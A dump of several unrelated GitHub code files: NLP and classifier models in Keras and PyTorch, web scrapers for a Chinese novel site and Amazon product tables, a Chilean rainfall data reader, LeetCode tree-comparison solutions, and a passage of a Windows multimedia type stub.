np.zeros(300)\n features.append(np.append(head_vector, gensim_model[word_lem]))\n labels.append(dep)\n return np.array(features), labels\n\nprint(\"Load Vectors\")\ngensim_model = KeyedVectors.load_word2vec_format(\"fiction.lowercased.lemmatized.300d\")\nprint(\"Load Train Data\")\ntrain_features, train_labels = prepare_data('uk_iu-ud-train.conllu')\nprint(\"Load Test Data\")\ntest_features, test_labels = prepare_data('uk_iu-ud-test.conllu')\n\nprint(\"Binarize Labels\")\nlabels_dict = {x: 1 for x in train_labels + test_labels}\nlabels_list = [key for key, value in labels_dict.items()]\n\ntrain_labels = label_binarize(train_labels, classes=labels_list)\ntest_labels = label_binarize(test_labels, classes=labels_list)\n\n\nprint(\"Build Keras Model\")\n# LSTM network\ninputs = Input(shape=(600,1))\n\nx = Bidirectional(LSTM(64, return_sequences=True),\n merge_mode='concat')(inputs)\nx = Dropout(0.2)(x)\nx = Flatten()(x)\noutputs = Dense(len(labels_list), activation='softmax')(x)\n\nkeras_model = Model(inputs=inputs, outputs=outputs, name='LSTM')\ntrain_features = np.expand_dims(train_features, axis=2)\ntest_features = np.expand_dims(test_features, axis=2)\n\nprint(\"Compile Keras Model\")\n# Compile the model\nsgd = SGD(lr=0.01, decay=1e-6, momentum=0.9, nesterov=True)\nkeras_model.compile(optimizer=sgd, loss='categorical_crossentropy', metrics=['acc'])\n\n# Define number of epochs\nepochs = 15\n\nprint(\"Fit Model\")\n\n# Fit the model to the training data\nestimator = keras_model.fit(train_features, train_labels, validation_split=0.2, epochs=epochs, batch_size=128, verbose=1)\n\nprint(\"Training accuracy: %.2f%% / Validation accuracy: %.2f%%\" % \n (100*estimator.history['acc'][-1], 100*estimator.history['val_acc'][-1]))\n\nprint(\"Make Prediction\")\n# Make predictions\npredicted_prob = keras_model.predict(test_features)\n\n# Report log loss and score\nloss_sk = log_loss(test_labels, predicted_prob)\nprint('Log loss is: {}'.format(loss_sk))","repo_name":"sudodoki/prj-nlp","sub_path":"students/anastasiia_nutsa/11/UDepParser.pyw","file_name":"UDepParser.pyw","file_ext":"pyw","file_size_in_byte":3123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"37004701567","text":"#coding:utf-8\nimport requests\nimport threading\nfrom bs4 import BeautifulSoup\nimport re\nimport os\nimport time\nimport sys\n\n\n#请求头字典\nreq_header={\n\n\n'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',\n'Accept-Encoding':'gzip, deflate',\n'Accept-Language':'zh-CN,zh;q=0.8',\n'Cache-Control':'max-age=0',\n'Connection':'keep-alive',\n'Cookie':'UM_distinctid=16168fde09f26b-0537c19fda550a-6b1b1279-13c680-16168fde0a0579; CNZZDATA1262370505=1455279024-1517880909-https%253A%252F%252Fwww.baidu.com%252F%7C1517978164',\n'Host':'www.xxbiquge.com',\n'If-Modified-Since':'Fri, 01 Dec 2017 12:56:21 GMT',\n'If-None-Match':'W/\"5a215175-19f8e\"',\n'Referer':'https://www.baidu.com/link?url=CKL6orNW3U0_kvak-7yrwW17WQdCS2PoTROZY4-UrIHipK9UsFPQOYqoZSq5Ucnl&wd=&eqid=ddcc05780001ebac000000065a7a846a',\n'Upgrade-Insecure-Requests':'1',\n'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',\n\n}\n\n\nreq_url_base='https://www.xxbiquge.com/' #小说主地址\n\n#小说下载函数\n#txt_id:小说编号\n#txt字典项介绍\n#id:小说编号\n# title:小说题目\n# first_page:第一章页面\n# txt_section:章节地址\n# section_name:章节名称\n# section_text:章节正文\n# section_ct:章节页数\ndef get_txt(txt_id):\n txt={}\n txt['title']=''\n txt['id']=str(txt_id)\n try:\n #print(\"请输入需要下载的小说编号:\")\n #txt['id']=input()\n req_url=req_url_base+ txt['id']+'/' #根据小说编号获取小说URL\n print(\"小说编号:\"+txt['id'])\n res=requests.get(req_url,params=req_header) #获取小说目录界面\n res.encoding='utf-8' #显式地指定网页编码,一般情况可以不用\n soups=BeautifulSoup(res.text,\"html.parser\") #soup转化\n #获取小说题目\n txt['title']=soups.select('#wrapper .box_con #maininfo #info h1')[0].text\n txt['author']=soups.select('#wrapper .box_con #maininfo #info p')\n #获取小说最近更新时间\n txt['update']=txt['author'][2].text\n #获取最近更新章节名称\n txt['lately'] = txt['author'][3].text\n #获取小说作者\n txt['author']=txt['author'][0].text\n #获取小说简介\n txt['intro']=soups.select('#wrapper .box_con #maininfo #intro')[0].text.strip()\n print(\"编号:\"+'{0:0>8} '.format(txt['id'])+ \"小说名:《\"+txt['title']+\"》 开始下载。\")\n print(\"正在寻找第一章页面。。。\")\n #获取小说所有章节信息\n first_page=soups.select('#wrapper .box_con #list dl dd a')\n #获取小说总章页面数\n section_ct=len(first_page)\n #获取小说第一章页面地址\n first_page = first_page[0]['href'].split('/')[2]\n print(\"小说章节页数:\"+str(section_ct))\n print(\"第一章地址寻找成功:\"+ first_page)\n #设置现在下载小说章节页面\n txt_section=first_page\n #打开小说文件写入小说相关信息\n fo = open('{0:0>8}-{1}.txt.download'.format(txt['id'],txt['title']), \"ab+\")\n fo.write((txt['title']+\"\\r\\n\").encode('UTF-8'))\n fo.write((txt['author'] + \"\\r\\n\").encode('UTF-8'))\n fo.write((txt['update'] + \"\\r\\n\").encode('UTF-8'))\n fo.write((txt['lately'] + \"\\r\\n\").encode('UTF-8'))\n fo.write((\"*******简介*******\\r\\n\").encode('UTF-8'))\n fo.write((\"\\t\"+txt['intro'] + \"\\r\\n\").encode('UTF-8'))\n fo.write((\"******************\\r\\n\").encode('UTF-8'))\n #进入循环,写入每章内容\n while(1):\n try:\n #请求当前章节页面\n r=requests.get(req_url+str(txt_section),params=req_header)\n r.encoding='utf-8' #显式地指定网页编码,一般情况可以不用\n #soup转换\n soup=BeautifulSoup(r.text,\"html.parser\")\n #获取章节名称\n section_name=soup.select('#wrapper .content_read .box_con .bookname h1')[0]\n section_text=soup.select('#wrapper .content_read .box_con #content')[0]\n #获取章节文本\n section_text=re.sub( '\\s+', '\\r\\n\\t', section_text.text).strip('\\r\\n')#\n #获取下一章地址\n txt_section=soup.select('#wrapper .content_read .box_con .bottem2 a')[2]['href'].split('/')[2]\n #判断是否最后一章,当为最后一章时,会跳转至目录地址,最后一章则跳出循环\n if(txt_section==''):\n print(\"编号:\"+'{0:0>8} '.format(txt['id'])+ \"小说名:《\"+txt['title']+\"》 下载完成\")\n break\n #以二进制写入章节题目\n fo.write((\"\\r\\n\"+section_name.text+\"\\r\\n\").encode('UTF-8'))\n #以二进制写入章节内容\n fo.write((section_text+'\\r\\n').encode('UTF-8'))\n print(txt['title']+' 章节:'+section_name.text+' 已下载')\n print(txt_section)\n except:\n print(\"编号:\"+'{0:0>8} '.format(txt['id'])+ \"小说名:《\"+txt['title']+\"》 章节下载失败,正在重新下载。\")\n fo.close()\n os.rename('{0:0>8}-{1}.txt.download'.format(txt['id'],txt['title']), '{0:0>8}-{1}.txt'.format(txt['id'],txt['title']))\n except: #出现错误会将错误信息写入dowload.log文件,同时答应出来\n fo_err = open('dowload.log', \"ab+\")\n try:\n fo_err.write(('['+time.strftime('%Y-%m-%d %X', time.localtime())+\"]:编号:\" + '{0:0>8} '.format(txt['id']) + \"小说名:《\" + txt['title'] + \"》 下载失败。\\r\\n\").encode('UTF-8'))\n print('['+time.strftime('%Y-%m-%d %X', time.localtime())+\"]:编号:\"+'{0:0>8} '.format(txt['id'])+ \"小说名:《\"+txt['title']+\"》 下载失败。\")\n os.rename('{0:0>8}'.format(txt['id']) + '-' + txt['title'] + '.txt.download',\n '{0:0>8}'.format(txt['id']) + '-' + txt['title'] + '.txt.error')\n except:\n fo_err.write(('['+time.strftime('%Y-%m-%d %X', time.localtime())+\"]:编号:\"+'{0:0>8} '.format(txt['id'])+\"下载失败。\\r\\n\").encode('UTF-8'))\n print('['+time.strftime('%Y-%m-%d %X', time.localtime())+\"]:编号:\"+'{0:0>8} '.format(txt['id'])+\"下载失败。\")\n finally: #关闭文件\n fo_err.close()\n\n#此处为需要下载小说的编号,编号获取方法在上文中已经讲过。\n# get_txt('20_20069')\n\nget_txt(\"79_79938\")","repo_name":"perennisY/python","sub_path":"05.py","file_name":"05.py","file_ext":"py","file_size_in_byte":6648,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"71910632857","text":"import torch\nfrom torch.autograd import Variable\nfrom torch.nn import functional as F\n\nclass LogisticRegression(torch.nn.Module):\n def __init__(self, input_dim, output_dim):\n super(LogisticRegression, self).__init__()\n self.linear = torch.nn.Linear(input_dim, output_dim)\n\n def forward(self, x):\n outputs = self.linear(x)\n return outputs\n\nclass FC2(torch.nn.Module):\n def __init__(self, input_dim, output_dim, dropout, dropout_p=0.5):\n super(FC2, self).__init__()\n self.fc1 = torch.nn.Linear(input_dim, 512)\n self.relu = torch.nn.ReLU()\n self.fc2 = torch.nn.Linear(512, output_dim)\n self.apply_dropout = dropout\n self.dropout = torch.nn.Dropout(dropout_p)\n\n def forward(self, x):\n x = self.fc1(x)\n x = self.relu(x)\n if self.apply_dropout:\n x = self.dropout(x)\n outputs = self.fc2(x)\n return outputs\n \n \nclass FC4(torch.nn.Module):\n def __init__(self, input_dim, output_dim, dropout, dropout_p=0.5):\n super(FC4, self).__init__()\n self.fc1 = torch.nn.Linear(input_dim, 512)\n self.relu = torch.nn.ReLU()\n self.fc2 = torch.nn.Linear(512, 512)\n self.fc3 = torch.nn.Linear(512, 512)\n self.fc4 = torch.nn.Linear(512, output_dim)\n self.apply_dropout = dropout\n self.do1 = torch.nn.Dropout(dropout_p)\n self.do2 = torch.nn.Dropout(dropout_p)\n self.do3 = torch.nn.Dropout(dropout_p)\n\n def forward(self, x):\n x = self.fc1(x)\n x = self.relu(x)\n if self.apply_dropout:\n x = self.do1(x)\n x = self.fc2(x)\n x = self.relu(x)\n if self.apply_dropout:\n x = self.do2(x)\n x = self.fc3(x)\n x = self.relu(x)\n if self.apply_dropout:\n x = self.do3(x)\n outputs = self.fc4(x)\n return outputs","repo_name":"hechmik/voxceleb_enrichment_age_gender","sub_path":"notebooks/src/gender_classifiers.py","file_name":"gender_classifiers.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"68"} +{"seq_id":"35158412122","text":"from config import opt\n\nfrom keras import *\nfrom keras.optimizers import *\n\nfrom utils import *\n\ndef siamese_rnn(embedding_matrix,is_use_word):\n if is_use_word: text_len = opt.MAX_WORD_SEQUENCE_LENGTH\n else: text_len = opt.MAX_CHAR_SEQUENCE_LENGTH\n\n embedding_layer = Embedding( len(embedding_matrix),\n embedding_matrix.shape[1],\n weights=[embedding_matrix],\n input_length=text_len,\n trainable=False)\n\n norm = BatchNormalization()\n\n q1_input = Input(shape=(text_len,), dtype=\"int32\")\n q1 = embedding_layer(q1_input)\n q1 = norm(q1)\n q1_embed = SpatialDropout1D(0.3)(q1)\n\n\n q2_input = Input(shape=(text_len,), dtype=\"int32\")\n q2 = embedding_layer(q2_input)\n q2 = norm(q2)\n q2_embed = SpatialDropout1D(0.3)(q2)\n\n # char_bilstm_layer1 = Bidirectional(LSTM(300, return_sequences=True),merge_mode='sum')\n # char_bilstm_layer2 = Bidirectional(LSTM(300, return_sequences=True),merge_mode='sum')\n char_bilstm_layer1 = Bidirectional(CuDNNLSTM(300, return_sequences=True),merge_mode='sum')\n char_bilstm_layer2 = Bidirectional(CuDNNLSTM(300, return_sequences=True),merge_mode='sum')\n\n q1_temp,q2_temp = char_bilstm_layer1(q1_embed),char_bilstm_layer1(q2_embed)\n q1,q2 = char_bilstm_layer2(q1_temp),char_bilstm_layer2(q2_temp)\n\n merged_max = pool_corr(q1, q2, 'max', 'jaccard')\n merged_ave = pool_corr(q1, q2, 'ave', 'jaccard')\n\n # features_input = Input(shape=[features_train.shape[1]], dtype='float')\n # features_dense = BatchNormalization()(features_input)\n # features_dense = Dropout(0.3)(Dense(1024, activation='relu')(features_dense))\n # features_dense = BatchNormalization()(features_dense)\n # features_dense = Dense(512, activation='relu')(features_dense)\n\n features = Input(shape=(5,), dtype=\"float32\")\n\n merged = concatenate([merged_ave,merged_max,features])\n # merged = Dropout(0.2)(merged)\n # merged = BatchNormalization()(merged)\n merged = Dense(512,activation='relu')(merged)\n merged = Dense(512,activation='relu')(merged)\n output = Dense(1, activation='sigmoid')(merged)\n\n lr=0.0002\n\n model = Model(inputs=[q1_input,q2_input,features], outputs=output)\n\n model.compile(loss='binary_crossentropy',optimizer=Nadam(lr),metrics=['binary_crossentropy','accuracy',f1])\n # model.load_weights(\"./data/weights_best_0.0008.hdf5\")\n\n return model","repo_name":"Typistzhao/chip2018","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2431,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"15230601479","text":"# -*- coding: utf-8 -*-\n\"\"\" Descripción\nLectura de datos de precipitación.\nArchivos compilados de datos observacionales CR2 \n\nSitio web: http://www.cr2.cl/datos-de-precipitacion/\nArchivo: cr2_prDaily_2018_ghcn.zip\n\nJosé Ignacio Saldías \njose.saldias@cigiden.cl\n\"\"\"\n\n# =============================================================================\n# Dependencias requeridas\n# =============================================================================\n\n# Incluidas en python\nimport os\nimport time\n\n# Instaladas a través de Anaconda\nimport numpy as np\nimport pandas as pd\n\n# =============================================================================\n# Manejo de Directorio\n# =============================================================================\n\n# Nombres\ndir_loc = os.getcwd() # Directorio local\nn_archivo = 'cr2_prDaily_2018_ghcn.txt' # Nombre del archivo\n\n# Rutas\nr_archivo = os.path.join(dir_loc, n_archivo) # Ruta absoluta al archivo\n\n\n# =============================================================================\n# Guía general para la extracción de datos y cómputos iniciales\n# =============================================================================\n\n# Lectura de datos\nprint('\\nLeyendo archivo: {}'.format(n_archivo)) # Punto de seguimiento\ninicio = time.process_time() # Medición de desempeño\ndf = pd.read_csv(r_archivo, # Ruta del archivo a abrir\n na_values=[-9999], # -9999 pasa a ser NaN\n index_col = 0, # Índice de DataFrame\n low_memory=False) # Uso para leer múltiples datatypes\nprint('Lectura de datos realizada en:',round(time.process_time() - inicio, 1),\n 'segundos\\n')\n\n# Resumen de todas las estaciones\nprint('Resumen de todas las estaciones:\\n',\n df.iloc[0:14])\n\n# También se pueden sortear estaciones por nombre\ndf.columns = df.loc['nombre'].values\nprint('Estaciones sorteadas por nombre')\n\n# Selección según atributo (ej. nombre de estaciones en latitudes -30 y -35)\ne_filtradas = df.loc['latitud'][(\n df.loc['latitud'].astype(float)<-30)\n & \n (df.loc['latitud'].astype(float)>-35)]\nprint('Estaciones entre latitudes -30 y -35\\n',e_filtradas)\n\n# =============================================================================\n# Ejemplo Quinta Normal\n# =============================================================================\nprint('\\n===============================================================\\n\\n',\n 'Seleccionando estación Quinta Normal Santiago')\nqta_n = df['Quinta Normal Santiago'].iloc[14::].astype(float) # Filtro inicial\n\n# Selección por fechas\nprint('Seleccionando preiodo 1979-01-01 a 2016-12-31')\nqta_n = qta_n[(qta_n.index >= '1979-01-01') & (qta_n.index <= '2016-12-31')] \n\n# Resampleado a frecuencia anual\nprint('Tranformando índice para resampleado\\n')\nqta_n.index = pd.to_datetime(qta_n.index)\nprint('Resampleando datos')\nqta_n_s = qta_n.resample('YS').sum()\nqta_n = qta_n.resample('YS').max()\n\n\ndef resumen_estadisticas(df):\n print('Resumen de estadisticas')\n media = df.mean()\n mediana = df.median()\n desv = df.std()\n kurtosis = df.kurtosis()\n n_mayores = df.nlargest(10)\n n_menores = df.nsmallest(10)\n \n print('\\n############################\\n',\n '\\nMedia:\\t', media,\n '\\nMediana:\\t', mediana,\n '\\nDesvición:\\t', desv,\n '\\nKurtosis:\\t', kurtosis,\n '\\n\\n10 mayores:\\n\\t', n_mayores,\n '\\n\\n10 menores:\\n\\t', n_menores,\n '\\n-----------------------'\n )\n return\n\n# Resumen de estadisticas precipitaciones máximas anuales\nprint('\\n Resampleado de datos a precipitacion anual acumulada')\nresumen_estadisticas(qta_n)\n\nprint('\\n Resampleado de datos a precipitacion anual acumulada')\n# Resumen de estadisticas\nresumen_estadisticas(qta_n_s)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"JoseSaldias/Pydraulics","sub_path":"Hidrologia/(Python) Lectura y analisis estaciones CR2/examinacion_estaciones.py","file_name":"examinacion_estaciones.py","file_ext":"py","file_size_in_byte":3913,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"32179070216","text":"from matplotlib.pyplot import table\r\nimport requests \r\nimport pandas as pd \r\nfrom bs4 import BeautifulSoup\r\n\r\n\r\nurl = 'https://www.amazon.it/Philips-hd2581-00-Tostapane-nero/dp/B01N9XBDTI/ref=sr_1_5?__mk_it_IT=%C3%85M%C3%85%C5%BD%C3%95%C3%91&crid=26VHA14FAG6ZX&keywords=toaster&qid=1648288905&sprefix=toaster%2Caps%2C80&sr=8-5&th=1'\r\n\r\ndef scrape_amz_tables(url): \r\n # Use splash to scrape the web \r\n r = requests.get('http://localhost:8050/render.html', params = {'url': url, 'wait':2})\r\n soup = BeautifulSoup(r.text, 'html.parser')\r\n\r\n # find the table\r\n table_attrib = soup.find('table', {'id': 'productDetails_techSpec_section_1'})\r\n \r\n col_names = []\r\n dati_tab = []\r\n # iterate along all the columns of the table\r\n for row in table_attrib.tbody.find_all('tr'):\r\n dati = row.text.replace('\\u200e', '')\r\n dati = ' '.join(dati.split())\r\n ind_split = dati.find(' ')\r\n col_names.append(dati[:ind_split]) \r\n dati_tab.append(dati[ind_split+1 :]) \r\n\r\n average_rating = float((soup.find('span', {'class' : 'a-icon-alt'}).text).replace(' su 5 stelle', '').replace(',', '.'))\r\n col_names.append('Average Rating')\r\n dati_tab.append(average_rating)\r\n df = pd.DataFrame([dati_tab], columns= col_names)\r\n df.to_excel('E:/webscraping/tab_prod.xlsx')\r\n\r\n\r\nscrape_amz_tables(url)","repo_name":"AlbertoDeBenedittis/Amz-reviews-Analysis","sub_path":"product_attributes.py","file_name":"product_attributes.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"39180075045","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\nfrom collections import deque\n\n\nclass Solution(object):\n def isSameTree(self, p, q):\n \"\"\"\n :type p: TreeNode\n :type q: TreeNode\n :rtype: bool\n \"\"\"\n pq = deque()\n qq = deque()\n pq.append(p)\n qq.append(q)\n\n while pq and qq:\n x, y = pq.popleft(), qq.popleft()\n if not (x == y == None or x and y and x.val == y.val):\n return False\n if x:\n pq.append(x.left)\n pq.append(x.right)\n if y:\n qq.append(y.left)\n qq.append(y.right)\n return True\n\n\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def isSameTree(self, p, q):\n \"\"\"\n :type p: TreeNode\n :type q: TreeNode\n :rtype: bool\n \"\"\"\n if p == q == None:\n return True\n if not (p and q and p.val == q.val):\n return False\n\n return self.isSameTree(p.left, q.left) and self.isSameTree(p.right, q.right)\n","repo_name":"Mschikay/leetcode","sub_path":"100. Same Tree.py","file_name":"100. Same Tree.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"17896079415","text":"from _typeshed import Incomplete\n\nMAXPNAMELEN: int\nMAXERRORLENGTH: int\nMAX_JOYSTICKOEMVXDNAME: int\nMM_MICROSOFT: int\nMM_MIDI_MAPPER: int\nMM_WAVE_MAPPER: int\nMM_SNDBLST_MIDIOUT: int\nMM_SNDBLST_MIDIIN: int\nMM_SNDBLST_SYNTH: int\nMM_SNDBLST_WAVEOUT: int\nMM_SNDBLST_WAVEIN: int\nMM_ADLIB: int\nMM_MPU401_MIDIOUT: int\nMM_MPU401_MIDIIN: int\nMM_PC_JOYSTICK: int\nTIME_MS: int\nTIME_SAMPLES: int\nTIME_BYTES: int\nTIME_SMPTE: int\nTIME_MIDI: int\nTIME_TICKS: int\nMM_JOY1MOVE: int\nMM_JOY2MOVE: int\nMM_JOY1ZMOVE: int\nMM_JOY2ZMOVE: int\nMM_JOY1BUTTONDOWN: int\nMM_JOY2BUTTONDOWN: int\nMM_JOY1BUTTONUP: int\nMM_JOY2BUTTONUP: int\nMM_MCINOTIFY: int\nMM_WOM_OPEN: int\nMM_WOM_CLOSE: int\nMM_WOM_DONE: int\nMM_WIM_OPEN: int\nMM_WIM_CLOSE: int\nMM_WIM_DATA: int\nMM_MIM_OPEN: int\nMM_MIM_CLOSE: int\nMM_MIM_DATA: int\nMM_MIM_LONGDATA: int\nMM_MIM_ERROR: int\nMM_MIM_LONGERROR: int\nMM_MOM_OPEN: int\nMM_MOM_CLOSE: int\nMM_MOM_DONE: int\nMM_STREAM_OPEN: int\nMM_STREAM_CLOSE: int\nMM_STREAM_DONE: int\nMM_STREAM_ERROR: int\nMM_MOM_POSITIONCB: int\nMM_MIM_MOREDATA: int\nMM_MIXM_LINE_CHANGE: int\nMM_MIXM_CONTROL_CHANGE: int\nMMSYSERR_BASE: int\nWAVERR_BASE: int\nMIDIERR_BASE: int\nTIMERR_BASE: int\nJOYERR_BASE: int\nMCIERR_BASE: int\nMIXERR_BASE: int\nMCI_STRING_OFFSET: int\nMCI_VD_OFFSET: int\nMCI_CD_OFFSET: int\nMCI_WAVE_OFFSET: int\nMCI_SEQ_OFFSET: int\nMMSYSERR_NOERROR: int\nMMSYSERR_ERROR: Incomplete\nMMSYSERR_BADDEVICEID: Incomplete\nMMSYSERR_NOTENABLED: Incomplete\nMMSYSERR_ALLOCATED: Incomplete\nMMSYSERR_INVALHANDLE: Incomplete\nMMSYSERR_NODRIVER: Incomplete\nMMSYSERR_NOMEM: Incomplete\nMMSYSERR_NOTSUPPORTED: Incomplete\nMMSYSERR_BADERRNUM: Incomplete\nMMSYSERR_INVALFLAG: Incomplete\nMMSYSERR_INVALPARAM: Incomplete\nMMSYSERR_HANDLEBUSY: Incomplete\nMMSYSERR_INVALIDALIAS: Incomplete\nMMSYSERR_BADDB: Incomplete\nMMSYSERR_KEYNOTFOUND: Incomplete\nMMSYSERR_READERROR: Incomplete\nMMSYSERR_WRITEERROR: Incomplete\nMMSYSERR_DELETEERROR: Incomplete\nMMSYSERR_VALNOTFOUND: Incomplete\nMMSYSERR_NODRIVERCB: Incomplete\nMMSYSERR_LASTERROR: Incomplete\nDRV_LOAD: int\nDRV_ENABLE: int\nDRV_OPEN: int\nDRV_CLOSE: int\nDRV_DISABLE: int\nDRV_FREE: int\nDRV_CONFIGURE: int\nDRV_QUERYCONFIGURE: int\nDRV_INSTALL: int\nDRV_REMOVE: int\nDRV_EXITSESSION: int\nDRV_POWER: int\nDRV_RESERVED: int\nDRV_USER: int\nDRVCNF_CANCEL: int\nDRVCNF_OK: int\nDRVCNF_RESTART: int\nDRV_CANCEL: int\nDRV_OK: int\nDRV_RESTART: int\nDRV_MCI_FIRST: int\nDRV_MCI_LAST: Incomplete\nCALLBACK_TYPEMASK: int\nCALLBACK_NULL: int\nCALLBACK_WINDOW: int\nCALLBACK_TASK: int\nCALLBACK_FUNCTION: int\nCALLBACK_THREAD: int\nCALLBACK_EVENT: int\nSND_SYNC: int\nSND_ASYNC: int\nSND_NODEFAULT: int\nSND_MEMORY: int\nSND_LOOP: int\nSND_NOSTOP: int\nSND_NOWAIT: int\nSND_ALIAS: int\nSND_ALIAS_ID: int\nSND_FILENAME: int\nSND_RESOURCE: int\nSND_PURGE: int\nSND_APPLICATION: int\nSND_ALIAS_START: int\nWAVERR_BADFORMAT: Incomplete\nWAVERR_STILLPLAYING: Incomplete\nWAVERR_UNPREPARED: Incomplete\nWAVERR_SYNC: Incomplete\nWAVERR_LASTERROR: Incomplete\nWOM_OPEN: int\nWOM_CLOSE: int\nWOM_DONE: int\nWIM_OPEN: int\nWIM_CLOSE: int\nWIM_DATA: int\nWAVE_MAPPER: int\nWAVE_FORMAT_QUERY: int\nWAVE_ALLOWSYNC: int\nWAVE_MAPPED: int\nWAVE_FORMAT_DIRECT: int\nWAVE_FORMAT_DIRECT_QUERY: Incomplete\nWHDR_DONE: int\nWHDR_PREPARED: int\nWHDR_BEGINLOOP: int\nWHDR_ENDLOOP: int\nWHDR_INQUEUE: int\nWAVECAPS_PITCH: int\nWAVECAPS_PLAYBACKRATE: int\nWAVECAPS_VOLUME: int\nWAVECAPS_LRVOLUME: int\nWAVECAPS_SYNC: int\nWAVECAPS_SAMPLEACCURATE: int\nWAVECAPS_DIRECTSOUND: int\nWAVE_INVALIDFORMAT: int\nWAVE_FORMAT_1M08: int\nWAVE_FORMAT_1S08: int\nWAVE_FORMAT_1M16: int\nWAVE_FORMAT_1S16: int\nWAVE_FORMAT_2M08: int\nWAVE_FORMAT_2S08: int\nWAVE_FORMAT_2M16: int\nWAVE_FORMAT_2S16: int\nWAVE_FORMAT_4M08: int\nWAVE_FORMAT_4S08: int\nWAVE_FORMAT_4M16: int\nWAVE_FORMAT_4S16: int\nWAVE_FORMAT_PCM: int\nWAVE_FORMAT_IEEE_FLOAT: int\nMIDIERR_UNPREPARED: Incomplete\nMIDIERR_STILLPLAYING: Incomplete\nMIDIERR_NOMAP: Incomplete\nMIDIERR_NOTREADY: Incomplete\nMIDIERR_NODEVICE: Incomplete\nMIDIERR_INVALIDSETUP: Incomplete\nMIDIERR_BADOPENMODE: Incomplete\nMIDIERR_DONT_CONTINUE: Incomplete\nMIDIERR_LASTERROR: Incomplete\nMIDIPATCHSIZE: int\nMIM_OPEN: int\nMIM_CLOSE: int\nMIM_DATA: int\nMIM_LONGDATA: int\nMIM_ERROR: int\nMIM_LONGERROR: int\nMOM_OPEN: int\nMOM_CLOSE: int\nMOM_DONE: int\nMIM_MOREDATA: int\nMOM_POSITIONCB: int\nMIDI_IO_STATUS: int\nMIDI_CACHE_ALL: int\nMIDI_CACHE_BESTFIT: int\nMIDI_CACHE_QUERY: int\nMIDI_UNCACHE: int\nMOD_MIDIPORT: int\nMOD_SYNTH: int\nMOD_SQSYNTH: int\nMOD_FMSYNTH: int\nMOD_MAPPER: int\nMIDICAPS_VOLUME: int\nMIDICAPS_LRVOLUME: int\nMIDICAPS_CACHE: int\nMIDICAPS_STREAM: int\nMHDR_DONE: int\nMHDR_PREPARED: int\nMHDR_INQUEUE: int\nMHDR_ISSTRM: int\nMEVT_F_SHORT: int\nMEVT_F_LONG: int\nMEVT_F_CALLBACK: int\n\ndef MEVT_EVENTTYPE(x): ...\ndef MEVT_EVENTPARM(x): ...\n\nMIDISTRM_ERROR: int\nMIDIPROP_SET: int\nMIDIPROP_GET: int\nMIDIPROP_TIMEDIV: int\nMIDIPROP_TEMPO: int\nAUXCAPS_CDAUDIO: int\nAUXCAPS_AUXIN: int\nAUXCAPS_VOLUME: int\nAUXCAPS_LRVOLUME: int\nMIXER_SHORT_NAME_CHARS: int\nMIXER_LONG_NAME_CHARS: int\nMIXERR_INVALLINE: Incomplete\nMIXERR_INVALCONTROL: Incomplete\nMIXERR_INVALVALUE: Incomplete\nMIXERR_LASTERROR: Incomplete\nMIXER_OBJECTF_HANDLE: int\nMIXER_OBJECTF_MIXER: int\nMIXER_OBJECTF_HMIXER: Incomplete\nMIXER_OBJECTF_WAVEOUT: int\nMIXER_OBJECTF_HWAVEOUT: Incomplete\nMIXER_OBJECTF_WAVEIN: int\nMIXER_OBJECTF_HWAVEIN: Incomplete\nMIXER_OBJECTF_MIDIOUT: int\nMIXER_OBJECTF_HMIDIOUT: Incomplete\nMIXER_OBJECTF_MIDIIN: int\nMIXER_OBJECTF_HMIDIIN: Incomplete\nMIXER_OBJECTF_AUX: int\nMIXERLINE_LINEF_ACTIVE: int\nMIXERLINE_LINEF_DISCONNECTED: int\nMIXERLINE_LINEF_SOURCE: int\nMIXERLINE_COMPONENTTYPE_DST_FIRST: int\nMIXERLINE_COMPONENTTYPE_DST_UNDEFINED: Incomplete\nMIXERLINE_COMPONENTTYPE_DST_DIGITAL: Incomplete\nMIXERLINE_COMPONENTTYPE_DST_LINE: Incomplete\nMIXERLINE_COMPONENTTYPE_DST_MONITOR: Incomplete\nMIXERLINE_COMPONENTTYPE_DST_SPEAKERS: Incomplete\nMIXERLINE_COMPONENTTYPE_DST_HEADPHONES: Incomplete\nMIXERLINE_COMPONENTTYPE_DST_TELEPHONE: Incomplete\nMIXERLINE_COMPONENTTYPE_DST_WAVEIN: Incomplete\nMIXERLINE_COMPONENTTYPE_DST_VOICEIN: Incomplete\nMIXERLINE_COMPONENTTYPE_DST_LAST: Incomplete\nMIXERLINE_COMPONENTTYPE_SRC_FIRST: int\nMIXERLINE_COMPONENTTYPE_SRC_UNDEFINED: Incomplete\nMIXERLINE_COMPONENTTYPE_SRC_DIGITAL: Incomplete\nMIXERLINE_COMPONENTTYPE_SRC_LINE: Incomplete\nMIXERLINE_COMPONENTTYPE_SRC_MICROPHONE: Incomplete\nMIXERLINE_COMPONENTTYPE_SRC_SYNTHESIZER: Incomplete\nMIXERLINE_COMPONENTTYPE_SRC_COMPACTDISC: Incomplete\nMIXERLINE_COMPONENTTYPE_SRC_TELEPHONE: 